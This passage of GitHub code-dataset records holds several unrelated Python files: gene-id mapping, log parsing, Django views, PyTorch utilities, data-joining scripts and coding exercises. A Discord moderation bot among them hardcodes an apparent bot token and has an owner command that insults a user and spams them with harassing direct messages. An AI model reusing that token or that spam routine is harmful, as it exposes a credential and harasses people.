'+hash_mgiids_infile2[genename]+' is chosen.')\n\t\t\tif hash_mgiids_infile2.get(genename) == None:\n\t\t\t\tif mgiid != '':\n\t\t\t\t\thash_mgiids_infile2[genename] = mgiid\n\n\tfor line in infile3L[1:len(infile3L)]:\n\t\tvals = line.split(',')\n\t\tgenename = vals[0]\n\t\tgenename = genename.lower()\n\t\tmgiid = vals[1]\n\t\tif hash_mgiids_infile.get(genename) == None:\n\t\t\tif mgiid != '':\n\t\t\t\thash_mgiids_infile[genename] = mgiid\n\t\t#else:\n\t\t#\tprint(genename+' in '+infile3+' has more than one MGI id. '+hash_mgiids_infile3[genename]+' is chosen.')\n\t\tif hash_mgiids_infile3.get(genename) == None:\n\t\t\tif mgiid != '':\n\t\t\t\thash_mgiids_infile3[genename] = mgiid\n\n\tfor line in infile4L:\n\t\tm = re.match('^DR\\s+MGI;\\s+(MGI:\\d+);\\s+(.+)$',line)#DR MGI; MGI:103007; Epb4.1l4a.\n\t\tif m:\n\t\t\tgenename = m.group(2)\n\t\t\tgenename = genename.strip('.')\n\t\t\tgenename = genename.lower()\n\t\t\tmgiid = m.group(1)\n\t\t\tif hash_mgiids_infile.get(genename) == None:\n\t\t\t\thash_mgiids_infile[genename] = mgiid\n\t\t#\telse:\n\t\t#\t\tprint(genename+' in '+infile4+' has more than one MGI id. '+hash_mgiids_infile4[genename]+' is chosen.')\n\t\t\tif hash_mgiids_infile4.get(genename) == None:\n\t\t\t\tif mgiid != '':\n\t\t\t\t\thash_mgiids_infile4[genename] = mgiid\n\n\t#write MGI ids to file\n\tt = len(infileL)-1 #total no. of gene names\n\tj = 0 #no. of gene names with MGI ids\n\tk = 0 #no. of gene names with no MGI ids in MGI, Ensemble and Uniprot\n\tfw = open(outfile,'w')\n\tfw.write('GeneName,MGI_ID\\n')\n\tfor line in infileL[1:len(infileL)]:\n\t\tvals = line.split(',')\n\t\tgenename = vals[0]\n\t\tgenename2 = genename.lower()\t\t\n\t\tif hash_mgiids_infile.get(genename2)!= None:\n\t\t\tj += 1\n\t\t\tfw.write(genename+','+hash_mgiids_infile.get(genename2)+'\\n')\n\t\telse:\n\t\t\tfw.write(genename+',none\\n')\n\t\t\tk += 1\n\tfw.close()\n\tprint('total no. 
of gene names in infile: '+str(t))\n\tprint(str(j)+' gene names have MGI ids.')\n\tprint(str(k)+' gene names do not have MGI ids in MGI, Ensemble and Uniprot.')\n\tprint('MGI has '+str(len(hash_mgiids_infile2))+' MGI ids.')\n\tprint('Ensemble has '+str(len(hash_mgiids_infile3))+' MGI ids.')\n\tprint('Uniprot has '+str(len(hash_mgiids_infile4))+' MGI ids.')\n\nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"dtian09/Python-tools-to-analyse-genetic-data","sub_path":"get_mgiids.py","file_name":"get_mgiids.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"29288403794","text":"import itertools as it\nfrom typing import List, Dict, Callable\nfrom datetime import datetime\nfrom functools import lru_cache\n\nimport requests\n\nimport data_wrappers as dw\nimport logger\nfrom data_wrappers import Serializable\nfrom log_mapper.marker import MarkedToken\nfrom log_mapper.tokenizer import Token\nfrom log_mapper.QueryType import QueryType\n\n\nTokenGroups = Dict[str, List[MarkedToken]]\n\n\ndef __extract_datetime(token: Token) -> datetime:\n return datetime.strptime(token['date'] + ' ' + token['time'], '%Y-%m-%d %H:%M:%S')\n\n\n@lru_cache(maxsize=256)\ndef __extract_country(ip_address: str) -> str:\n logger.log_trace(f'Searching for user\\'s country by ip {ip_address}...')\n try:\n response = requests.get('http://ipinfo.io/json')\n return response.json()['country']\n except Exception as error:\n logger.log_warning(str(error))\n\n return ''\n\n\ndef __get_category_name(query: str) -> str:\n assert len(query.replace('https://', '').split('/')) >= 2, f'Got unexpected query: {query}'\n return query.replace('https://', '').split('/')[1]\n\n\ndef __get_goods_name(query: str) -> str:\n assert len(query.replace('https://', '').split('/')) >= 3, f'Got unexpected query: {query}'\n return query.replace('https://', '').split('/')[2]\n\n\ndef group_by_ip(marked_tokens: List[MarkedToken]) -> TokenGroups:\n marked_tokens = sorted(marked_tokens, key=lambda x: x[1]['ip'])\n return {ip: list(tokens) for ip, tokens in it.groupby(marked_tokens, key=lambda x: x[1]['ip'])}\n\n\ndef parse(groups: TokenGroups, logging_callback: Callable[[str], None] = None) -> List[Serializable]:\n total_lines_count = sum(len(group) for group in groups.values())\n current_line: int = 1\n queries_count: int = 0\n categories_visits_count: int = 0\n categories_count: int = 0\n transactions_count: int = 0\n transaction_items_count: int = 0\n active_carts: Dict[int, dw.Cart] = {}\n active_users: Dict[int, dw.User] = {}\n active_goods: Dict[int, dw.Goods] = {}\n categories_names: List[str] = []\n result: List[Serializable] = []\n for ip in groups.keys():\n for token_num, (token_type, token) in enumerate(groups[ip]):\n logger.log_trace(f'Line {current_line}/{total_lines_count}')\n\n if token_type == QueryType.CATEGORY:\n category_name = __get_category_name(token['query'])\n if category_name not in categories_names:\n category_id = categories_count\n\n category = dw.Category(category_id, category_name)\n categories_names.append(category_name)\n result.append(category)\n categories_count += 1\n else:\n category_id = categories_names.index(category_name)\n\n visit = dw.CategoriesVisit(\n categories_visits_count, category_id, __extract_datetime(token),\n token['ip'], __extract_country(token['ip'])\n )\n result.append(visit)\n categories_visits_count += 1\n elif token_type == QueryType.ADDITION:\n params = token['query'].split('?')[1].split('&') 
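The MGI-id record ending above pulls gene/identifier pairs out of UniProt 'DR   MGI; ...' lines with a regex. The same step isolated as a small helper, with the trailing dot folded into the pattern and the first-id-wins behaviour of the record's hash tables kept:

import re

DR_LINE = re.compile(r'^DR\s+MGI;\s+(MGI:\d+);\s+(.+)\.$')

def parse_uniprot_dr(lines):
    pairs = {}
    for line in lines:
        m = DR_LINE.match(line.strip())
        if m:  # keep the first MGI id seen for each gene name
            pairs.setdefault(m.group(2).lower(), m.group(1))
    return pairs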
# [goods_id=n, amount=m,cart_id=r]\n goods_id = int(params[0].split('=')[1])\n amount = int(params[1].split('=')[1])\n cart_id = int(params[2].split('=')[1])\n if goods_id not in active_goods.keys():\n previous_query = groups[ip][token_num - 1][1]['query']\n category_id = categories_names.index(__get_category_name(previous_query))\n goods = dw.Goods(goods_id, category_id, __get_goods_name(previous_query))\n\n active_goods[goods_id] = goods\n result.append(goods)\n\n if cart_id not in active_carts.keys():\n cart = dw.Cart(cart_id, {})\n cart.goods_amount[goods_id] = amount\n active_carts[cart_id] = cart\n elif goods_id in active_carts[cart_id].goods_amount.keys():\n active_carts[cart_id].goods_amount[goods_id] += amount\n else:\n active_carts[cart_id].goods_amount[goods_id] = amount\n elif token_type == QueryType.PAYMENT:\n params = token['query'].split('?')[1].split('&') # [user_id=n, cart_id=m]\n user_id = int(params[0].split('=')[1])\n cart_id = int(params[1].split('=')[1])\n if cart_id not in active_carts.keys():\n logger.log_error(f'Payment on non-existent cart {cart_id} detected. Skipping to the next query...')\n query = dw.Query(queries_count, token['ip'], token['query'], __extract_datetime(token))\n result.append(query)\n queries_count += 1\n continue\n\n if user_id not in active_users.keys():\n user = dw.User(user_id, 'Unknown', token['ip'], __extract_country(token['ip']), 1, 1)\n active_users[user_id] = user\n result.append(user) # this value will be changing via pointer in \"active_users\"\n else:\n active_users[user_id].visits_count += 1\n active_users[user_id].carts_count += 1\n active_users[user_id].last_ip = token['ip']\n\n transaction = dw.Transaction(transactions_count, user_id, __extract_datetime(token))\n transaction_items = []\n for goods_id, amount in active_carts[cart_id].goods_amount.items():\n transaction_item = dw.TransactionGoods(\n transaction_items_count, transactions_count, goods_id, amount\n )\n transaction_items_count += 1\n transaction_items.append(transaction_item)\n transactions_count += 1\n result.append(transaction)\n '''all transaction items should be added after transaction to satisfy db integrity'''\n result.extend(transaction_items)\n\n active_users[user_id].payments_count += 1\n del active_carts[cart_id] # this cart is used\n\n query = dw.Query(queries_count, token['ip'], token['query'], __extract_datetime(token))\n result.append(query)\n queries_count += 1\n\n current_line += 1\n\n result.extend(active_carts.values())\n if logging_callback is not None:\n logging_callback(\n f'Parsing completed, created {len(result)} wrappers.'\n )\n return result\n","repo_name":"Borstch/all_to_the_bottom_analysis","sub_path":"log_mapper/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13704867858","text":"def rotate_matrix(matrix):\n if len(matrix) == 0:\n return matrix\n if len(matrix) != len(matrix[0]):\n raise Exception(\"Matrix is not valid for rotation\")\n\n dimension = len(matrix)\n for i in range(dimension-1):\n start_idx = (0, i)\n tmp = matrix[start_idx[0]][start_idx[1]]\n for j in range(4):\n next_idx = (start_idx[1], dimension-1-start_idx[0])\n num = tmp\n tmp = matrix[next_idx[0]][next_idx[1]]\n matrix[next_idx[0]][next_idx[1]] = num\n start_idx = next_idx\n\n\nif __name__ == \"__main__\":\n\n matrix = [[0] * 3 for i in range(3)]\n\n matrix[0][1] = 1\n matrix[0][2] = 2\n matrix[1][0] = 3\n matrix[1][1] = 4\n 
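One behavioural note on the log-parser record above: __extract_country requests http://ipinfo.io/json without ever passing ip_address, so every cached lookup resolves to the machine running the parser rather than the visitor. A sketch of the per-IP form of the same service — the /<ip>/json path is an assumption about the intended endpoint:

import requests
from functools import lru_cache

@lru_cache(maxsize=256)
def extract_country(ip_address: str) -> str:
    try:
        resp = requests.get(f'http://ipinfo.io/{ip_address}/json', timeout=5)
        return resp.json().get('country', '')
    except requests.RequestException:
        return ''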
matrix[1][2] = 5\n matrix[2][0] = 6\n matrix[2][1] = 7\n matrix[2][2] = 8\n\n rotate_matrix(matrix)\n\n print(matrix)\n\n matrix = []\n print(matrix)\n\n matrix = [[0] * 2 for i in range(4)]\n rotate_matrix(matrix)\n","repo_name":"yjw9012/cracking-the-coding-interview","sub_path":"chapter-1/1.7-rotate_matrix.py","file_name":"1.7-rotate_matrix.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"696030640","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Document, DocumentCategory, SubCategory\nfrom .forms import DocumentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nimport os\nfrom django.core.files.storage import default_storage\n\n@login_required\ndef upload_document(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n document = form.save(commit=False)\n document.author = request.user # Set the author to the currently logged-in user\n document.save()\n form.save_m2m()\n return redirect('documents:document_list')\n else:\n form = DocumentForm()\n\n return render(request, 'documents/upload_document.html', {'form': form})\n\n@login_required\ndef document_list(request):\n categories = DocumentCategory.objects.all()\n return render(request, 'documents/document_list.html', {'categories': categories})\n\n@login_required\ndef download_document(request, document_id):\n document = get_object_or_404(Document, id=document_id)\n # Perform any permission checks here, if necessary\n return document.file.serve(request, document.file.name)\n\n@login_required\ndef delete_document(request, document_id):\n document = get_object_or_404(Document, id=document_id)\n # Perform any permission checks here, if necessary\n document.file.delete()\n document.delete()\n return redirect('documents:document_list')\n\n@login_required\ndef category_detail(request, category_id):\n category = get_object_or_404(DocumentCategory, id=category_id, groups__in=request.user.groups.all())\n categories = DocumentCategory.objects.all()\n return render(request, 'documents/category_detail.html', {'category': category, 'categories': categories})\n\n@login_required\ndef subcategory_detail(request, subcategory_id):\n try:\n subcategory = SubCategory.objects.get(id=subcategory_id)\n documents = Document.objects.filter(subcategory=subcategory)\n return render(request, 'documents/subcategory_detail.html', {'subcategory': subcategory, 'documents': documents})\n except SubCategory.DoesNotExist:\n return render(request, 'documents/subcategory_not_found.html')\n\ndef get_subcategories(request):\n category_id = request.GET.get('category_id')\n subcategories = SubCategory.objects.filter(category_id=category_id).values('id', 'name')\n return JsonResponse({'subcategories': list(subcategories)})\n\n\n","repo_name":"elikibula/fijibati-document-app","sub_path":"documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29663145003","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Developed by andy\r\n\r\nimport os\r\nimport sys\r\nimport torch\r\nimport numpy as np\r\nfrom datetime import datetime as dt\r\nfrom config import cfg\r\nimport torch.nn.functional as F\r\n\r\nimport cv2\r\n\r\ndef mkdir(path):\r\n if not os.path.isdir(path):\r\n 
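On the rotation record that closes above: its outer loop only visits top-row starting positions, which happens to cover the full perimeter of a 3x3 matrix but never rotates the inner rings of larger ones. A size-agnostic clockwise rotation as a hedged alternative (it returns a new matrix rather than mutating in place):

def rotate_clockwise(matrix):
    # Reverse the rows, then transpose: a 90-degree clockwise rotation.
    return [list(row) for row in zip(*matrix[::-1])]

# Example: rotate_clockwise([[0, 1], [2, 3]]) -> [[2, 0], [3, 1]]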
mkdir(os.path.split(path)[0])\r\n else:\r\n return\r\n os.mkdir(path)\r\n\r\ndef var_or_cuda(x):\r\n if torch.cuda.is_available():\r\n x = x.cuda(non_blocking=True)\r\n return x\r\n\r\n\r\ndef init_weights_xavier(m):\r\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):\r\n torch.nn.init.xavier_uniform_(m.weight)\r\n if m.bias is not None:\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.BatchNorm2d or type(m) == torch.nn.InstanceNorm2d:\r\n if m.weight is not None:\r\n torch.nn.init.constant_(m.weight, 1)\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.Linear:\r\n torch.nn.init.normal_(m.weight, 0, 0.01)\r\n torch.nn.init.constant_(m.bias, 0)\r\n\r\ndef init_weights_kaiming(m):\r\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):\r\n torch.nn.init.kaiming_normal_(m.weight)\r\n if m.bias is not None:\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.BatchNorm2d or type(m) == torch.nn.InstanceNorm2d:\r\n if m.weight is not None:\r\n torch.nn.init.constant_(m.weight, 1)\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.Linear:\r\n torch.nn.init.normal_(m.weight, 0, 0.01)\r\n torch.nn.init.constant_(m.bias, 0)\r\n\r\n\r\ndef save_deblur_checkpoints(file_path, epoch_idx, deblurnet, deblurnet_solver, Best_Img_PSNR, Best_Epoch):\r\n print('[INFO] %s Saving checkpoint to %s ...\\n' % (dt.now(), file_path))\r\n checkpoint = {\r\n 'epoch_idx': epoch_idx,\r\n 'Best_Img_PSNR': Best_Img_PSNR,\r\n 'Best_Epoch': Best_Epoch,\r\n 'deblurnet_state_dict': deblurnet.state_dict(),\r\n 'deblurnet_solver_state_dict': deblurnet_solver.state_dict(),\r\n }\r\n torch.save(checkpoint, file_path)\r\n\r\ndef save_checkpoints(file_path, epoch_idx, dispnet, dispnet_solver, deblurnet, deblurnet_solver, Disp_EPE, Best_Img_PSNR, Best_Epoch):\r\n print('[INFO] %s Saving checkpoint to %s ...' 
% (dt.now(), file_path))\r\n checkpoint = {\r\n 'epoch_idx': epoch_idx,\r\n 'Disp_EPE': Disp_EPE,\r\n 'Best_Img_PSNR': Best_Img_PSNR,\r\n 'Best_Epoch': Best_Epoch,\r\n 'dispnet_state_dict': dispnet.state_dict(),\r\n 'dispnet_solver_state_dict': dispnet_solver.state_dict(),\r\n 'deblurnet_state_dict': deblurnet.state_dict(),\r\n 'deblurnet_solver_state_dict': deblurnet_solver.state_dict(),\r\n }\r\n torch.save(checkpoint, file_path)\r\n\r\ndef count_parameters(model):\r\n return sum(p.numel() for p in model.parameters())\r\n\r\ndef get_weight_parameters(model):\r\n return [param for name, param in model.named_parameters() if ('weight' in name)]\r\n\r\ndef get_bias_parameters(model):\r\n return [param for name, param in model.named_parameters() if ('bias' in name)]\r\n\r\nclass AverageMeter(object):\r\n \"\"\"Computes and stores the average and current value\"\"\"\r\n def __init__(self):\r\n self.reset()\r\n\r\n def reset(self):\r\n # print(\"reset:\\n\")\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\n def __repr__(self):\r\n return '{:.5f} ({:.5f})'.format(self.val, self.avg)\r\n\r\n'''input Tensor: 2 H W'''\r\ndef graybi2rgb(graybi):\r\n assert(isinstance(graybi, torch.Tensor))\r\n global args\r\n _, H, W = graybi.shape\r\n rgb_1 = torch.zeros((3,H,W))\r\n rgb_2 = torch.zeros((3,H,W))\r\n normalized_gray_map = graybi / (graybi.max())\r\n rgb_1[0] = normalized_gray_map[0]\r\n rgb_1[1] = normalized_gray_map[0]\r\n rgb_1[2] = normalized_gray_map[0]\r\n\r\n rgb_2[0] = normalized_gray_map[1]\r\n rgb_2[1] = normalized_gray_map[1]\r\n rgb_2[2] = normalized_gray_map[1]\r\n return rgb_1.clamp(0,1), rgb_2.clamp(0,1)\r\n\r\ndef multiScaleImage(img):\r\n ans = []\r\n ans.append(img)\r\n downsample1 = F.interpolate(img, scale_factor=0.5)\r\n downsample2 = F.interpolate(img, scale_factor=0.25)\r\n ans.append(downsample1)\r\n ans.append(downsample2)\r\n return ans\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"andycor/Multi-scale-Grid-Network-for-Image-Deblurring-with-High-frequency-Guidance","sub_path":"utils/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"70287989911","text":"import os\nimport random\nimport nextcord\nfrom nextcord.ext import commands\n# from nextcord.utils import get\nfrom nextcord import ButtonStyle\nfrom nextcord.ui import Button, View, Modal, Select\nfrom dotenv import load_dotenv\nload_dotenv(dotenv_path=\"config\")\n\nintents = nextcord.Intents.default()\nintents.presences = True\nintents.members = True\nintents.typing = True\nintents.message_content = True\n\nclient = nextcord.Client(intents=intents)\n\nliste_mot_blacklist = [\n \"test\"\n]\n\nreponse_gros_mots = [\n \"Oh ton langage {} ! 
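The checkpoint helpers in the record above only cover saving. A matching loader, using exactly the dictionary keys the record writes; the function name and return tuple are editorial choices:

import torch

def load_deblur_checkpoint(file_path, deblurnet, deblurnet_solver):
    ckpt = torch.load(file_path)
    deblurnet.load_state_dict(ckpt['deblurnet_state_dict'])
    deblurnet_solver.load_state_dict(ckpt['deblurnet_solver_state_dict'])
    return ckpt['epoch_idx'], ckpt['Best_Img_PSNR'], ckpt['Best_Epoch']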
C'est pas la cité ici donc parle bien.\",\n \"Tu parles mal {} il va falloir te calmer !\",\n \"Tu es bien grossier dis donc {} !\",\n \"Orhhhhhhh {} je vais devoir te dire combien de fois de te calmer !?\"\n]\n\n\nchannel_cible = 1091449953047543852\n\n@client.event\nasync def on_ready():\n print(\"En ligne\")\n\n@client.event\nasync def on_message(message: nextcord.Message):\n for mot_blacklist in liste_mot_blacklist:\n if mot_blacklist in message.content.lower():\n print(\"insulte présent\")\n await message.reply(random.choice(reponse_gros_mots).format(message.author.mention))\n await message.delete()\n return\n\n elif \"@everyone\" in message.content.lower() and channel_cible not in [i.id for i in message.author.roles]: # type: ignore\n print(\"@everyone présent\")\n await message.reply(f\"{message.author.mention} ne mentionne pas tout le monde s'il te plait ça dérange tout le monde...\")\n await message.delete()\n return\n\n \n\n if message.content.split(\" \")[-1].lower() == \"quoi\":\n await message.reply(\"FEUR !\")\n return\n\n if channel_cible in [i.id for i in message.author.roles]: #MESSAGE OWNER\n if message.content.lower().startswith(\"ftg\"):\n pseudo = message.content.split(\" \")[-1]\n pseudo = client.get_user(int(pseudo[2:-1]))\n\n await message.channel.send(f\"C'est réel {pseudo.mention} ftg arrête d'aboyer.\")\n await pseudo.send(f\"T'as intérêt à te calmer dans le serveur {pseudo.mention} parce que là tu clc en vrai. Donc tg stp.\")\n for _ in range(7):\n await pseudo.send(f\"C'est un mini spam de prévention {pseudo.mention}, je peux aller jusqu'à ... BEAUCOUP !!\")\n\n \n elif message.content.lower().startswith(\"fais taire\"):\n pass\n \n elif message.content.lower().startswith(\"Arrête d'aboyer\"):\n pass\n\n# bot.run(os.getenv(\"TOKEN\"))\nclient.run(\"MTA5MTQ0ODYwNTg3OTA0MjEyNg.GIYSE6.DGcMh33Ksv_Z4VGVpkJGPw2lU9ejcqD1S-QcS0\")","repo_name":"DevJ2K/ProjetSoftwareDiscord","sub_path":"flask/botDiscord/botModerateur.py","file_name":"botModerateur.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39171065666","text":"import yaml\nfrom .Request import Request\nfrom .RequestRunner import RequestRunner\nfrom .Response import Response\n\nclass Script():\n\n '''\n @brief init script\n '''\n def __init__(self): \n self.__on_auto_request = None\n self.__reqs=[]\n self.__runners=[]\n self.__resps=[]\n self.__buff=[]\n self.__maxseq=0\n '''\n @brief set on auto request\n @param[IN] on_auto_request on request send callback\n '''\n def setOnAutoRequest(self, on_auto_request): \n self.__on_auto_request = on_auto_request\n \n '''\n @brief load script from file\n @param[IN] filename the file name\n '''\n def load(self, filename):\n f=open(filename, \"r\")\n root = yaml.load(f, Loader=yaml.FullLoader)\n reqs = root.get(\"reqs\", [])\n resps = root.get(\"resps\", [])\n for req in reqs:\n r=Request()\n r.load(req)\n self.__reqs.append(r)\n if r.Period():\n self.__runners.append(RequestRunner(r, self.onPeriod))\n for resp in resps:\n r=Response()\n r.load(resp)\n s=len(r)\n if self.__maxseq < s:\n self.__maxseq = s\n self.__resps.append(r)\n \n '''\n @brief start runners for all request\n '''\n def start(self):\n for r in self.__runners: \n r.start()\n \n '''\n @brief on runner period hit\n @param[IN] runner the RequestRunner\n @param[IN] data the data sequence to send\n '''\n def onPeriod(self, runner, data):\n if self.__on_auto_request : \n return self.__on_auto_request(data)\n 
return False\n \n '''\n @brief compute input data\n @return data to send or None\n '''\n def Compute(self, data):\n self.__buff += data\n if len(self.__buff)>self.__maxseq:\n self.__buff.pop(0)\n for resp in self.__resps:\n if resp == self.__buff:\n self.__buff=[]\n return self.Run(resp.Run())\n return None\n \n '''\n @brief run request\n @param[IN] title the request title\n @return data to send or None\n '''\n def Run(self, title):\n for r in self.__reqs:\n if r == title :\n return r.Seq()\n return None\n \n '''\n @brief string\n @return string\n '''\n def __str__(self):\n st = \"Requests :\"\n for req in self.__reqs:\n st += \"\\n\\t\"+str(req)\n st += \"\\nResponses :\"\n for resp in self.__resps:\n st += \"\\n\\t\"+str(resp)\n return st\n ","repo_name":"technosvitman/PyT1000","sub_path":"script/Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13325960021","text":"import argparse\r\nimport getpass\r\nfrom mcod_prep.utils.mcod_cluster_tools import submit_mcod\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description=\"Launcher for map_spec_drug_bug.py\")\r\n parser.add_argument(\"source\", nargs=\"+\")\r\n write_parser = parser.add_mutually_exclusive_group(required=True)\r\n write_parser.add_argument(\r\n '--write', dest='write', action='store_true',\r\n help='Write the output file from mapping '\r\n '(only use once your cleaning script has been approved)'\r\n )\r\n write_parser.add_argument(\r\n '--no-write', dest='write', action='store_false',\r\n help='Do not write the output file from mapping (used for testing purposes)'\r\n )\r\n args = parser.parse_args()\r\n assert {'all', 'new'}.isdisjoint(set(args.source)),\\\r\n \"The 'all' and 'new' options don't make sense in the launcher yet\"\r\n print(f\"Submitting jobs for sources {args.source}\")\r\n\r\n mem = {'SOURCE': \"200G\"}\r\n runtime = {'SOURCE': \"04:00:00\"}\r\n cores = {'SOURCE': 50}\r\n\r\n worker = \"FILEPATH\"\r\n for source in args.source:\r\n jobname = f\"map_amr_{source}\"\r\n submit_mcod(\r\n jobname, language='python', worker=worker,\r\n cores=cores.get(source, 1), memory=mem.get(source, \"10G\"),\r\n runtime=runtime.get(source, '00:30:00'),\r\n params=[source, '--write'], logging=True\r\n )\r\n","repo_name":"ihmeuw/amr","sub_path":"utils/launch_mapping.py","file_name":"launch_mapping.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"36651030537","text":"'''\nAuthor: Brian Mukeswe\nInstitution: The University of Edinburgh\nDepartment: School of Informatics\nContact: b.mukeswe@sms.ed.ac.uk\nDate: June 1, 2019 \n\nDescription: This script joins a specified sample of weather data\n with surveyed happiness data based on area codes. \n The script reports correlations between each weather attribute\n and happiness metric, and writes the joined dataset to a specified \n file format i.e. (either csv, xls, xlsx or standard output).\n The user can specify the following parameters:\n output: the format for reporting the joined dataset\n metrics: the metrics to use for correlation. 
options include the following\n (\"avg_rating\", \"happy\", \"unhappy\", \"low_0_4\", \"medium_5_6\", \"high_7_8\", \"vhigh_9_10\"\n features: The weather attributes to be included when reporting correlations.\n\n'''\n# import relevant libraries\nfrom pymongo import MongoClient\nimport pandas as pd\n# utilty functions\nfrom utility_scripts import classification_utils as part2_utils \nfrom utility_scripts import clustering_utils as part1_utils\nfrom utility_scripts import happiness_data_utils as utils\n\n## SETUP: user can specify input parameters here ##\noutput = 'xlsx' # choose from {'csv', 'xls', 'xlsx', 'standard'}\nmetrics = [\"avg_rating\", \"happy\", \"unhappy\"] # metrics to use for reporting corelations\nfeatures = [\"af_days\", \"rain_mm\", \"sun_hours\" , \"tmax_degC\",\"tmin_degC\"] # features to report\n\n\n## Get station location data ##\n# configure the database where the station data is stored\nserver = {\"host\":\"localhost\",\n \"port\":27017,\n \"dbName\":\"pitds_assessment3\",\n \"collection\":\"labeled_station_coords_3\"} # use the same database as part2\n\nclient = MongoClient(host=server[\"host\"], port=server[\"port\"])\ndb = client[server[\"dbName\"]]\ndatabase = db[server[\"collection\"]]\n\n# retrieve station coordinates\nstation_coords = part1_utils.query_to_dataframe({}, server[\"collection\"])\nprint(\"\\nRetrieved station coordinates\\n\")\nprint(station_coords.head(10))\n\n\n\n## Get happiness data from database##\nserver = {\"host\":\"localhost\",\n \"port\":27017,\n \"dbName\":\"pitds_assessment3\",\n \"collection\":\"happiness\"}\n\nhappiness = part1_utils.query_to_dataframe({}, server[\"collection\"])\nprint(\"\\nRetrieved happiness data\\n\")\nprint(happiness.head(10))\n\n\n\n## Sample weather data\n# Get weather data for a specified sample year or set of sample years\nsample_years = [2018]\nseason = [1,2,3,4,5,6,7,8,9,10,11,12]\nweather = part1_utils.get_weather_data(sample_years=sample_years) \nweather = part1_utils.fill_missing_values(weather)\nweather = part1_utils.get_season_average(season, weather)\nprint(\"\\nRetrieved sample weather data\\n\")\n\n\n## Join area codes with weather data and store new collection ##\nserver = {\"host\":\"localhost\",\n \"port\":27017,\n \"dbName\":\"pitds_assessment3\",\n \"collection\":\"weather_area\"}\n\ndatabase = db[server[\"collection\"]]\n\n# Join sampled weather data with area codes and store in a database collection\nweather_area = utils.join_weather_to_area_codes(weather, station_coords, happiness)\nutils.store_data(weather_area, database)\n\n\n## Aggregate weather data and happiness data using weather_area collection\n# specify aggregation details\nquery = [{\n '$lookup': {\n 'from': 'happiness', \n 'localField': 'area', \n 'foreignField': 'area_codes', \n 'as': 'happiness'\n }\n }\n ]\n\n# Join weather and happiness data\njoined = utils.aggregation_to_dataframe(query, database, station_coords)\n\n# Combine happiness metrics data into two categories happy and unhappy\nhappy = joined.high_7_8 + joined.vhigh_9_10\nhappy.name = \"happy\"\nunhappy = joined.low_0_4 + joined.medium_5_6\nunhappy.name = \"unhappy\"\njoined = pd.concat([joined,happy,unhappy], axis=1) \n\n\n# Report correlations\nutils.report_corelations(joined, features, metrics)\n \n# Report joined dataset\nif output == \"csv\":\n joined.to_csv(\"joined_data_set.csv\")\nelif output == \"standard\":\n print(joined)\nelse:\n joined.to_excel(\"joined_data_set.\"+output)\n 
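# Editor's sketch (an assumption, not the original utility_scripts code): the
# report_corelations helper used above is imported and not shown in this file.
# A minimal pandas version of the same idea might look like this:
def report_corelations_sketch(joined_frame, feature_cols, metric_cols):
    # Pearson correlation between every weather feature and happiness metric
    corr = joined_frame[feature_cols + metric_cols].corr()
    print(corr.loc[feature_cols, metric_cols])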
\n","repo_name":"mukeswebrian/Analysing-the-impact-of-weather-on-self-reported-happiness","sub_path":"part3_joining_data.py","file_name":"part3_joining_data.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"26719171335","text":"# Programmers 괄호 회전하기 (level2)\n# 파라미터 s를 x번 (1<=x<=len(s)) 왼쪽으로 회전할 때 s가 옮은 문자열이 된 횟수를 출력하시오.\n# 옮은 문자열이란 \"()\", \"{}\", \"[]\"이며, 옮은 문자열이 A일 때, \"(A)\", \"{A}\", \"[A]\"도 옮은 문자열이며 A,B가 옳은 문자열일 때, AB 역시 옳은 문자열이다.\n\nimport collections\npartner = {\"(\" : \")\", \"[\" : \"]\", \"{\" : \"}\", \")\" : \"(\", \"]\" : \"[\", \"}\" : \"{\"}\npartner_sort = {\"(\" : \")\", \"[\" : \"]\", \"{\" : \"}\"}\n\ndef solution(s):\n # 1. Is partner (exist) and counted the same? \n s_dict = collections.Counter(s)\n for key, value in s_dict.items():\n if value != s_dict.get(partner.get(key)):\n return 0\n # 2. Is partner arrangement correct? (ex. \"(\" precedes \")\")\n answer = 0\n for i in 